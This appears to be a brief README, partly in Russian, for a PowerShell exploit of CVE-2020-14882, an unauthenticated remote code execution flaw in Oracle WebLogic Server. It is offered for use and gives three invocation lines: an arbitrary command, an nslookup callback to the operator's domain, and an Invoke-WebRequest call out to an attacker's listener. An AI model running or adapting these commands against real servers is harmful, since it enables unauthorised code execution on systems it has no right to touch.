
CVE-2020-14882 rewritten in PowerShell
Этот скрипт PowerShell использует CVE-2020-14882 для неавторизованного удаленного выполнения кода на версиях Oracle WebLogic Server:
.\exploit.ps1 -target 'http(s)://target:7001' -command 'your_command'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'nslookup your_Domain'
.\exploit.ps1 -target 'http(s)://target:7001' -command 'powershell.exe -c Invoke-WebRequest -Uri http://your_listener'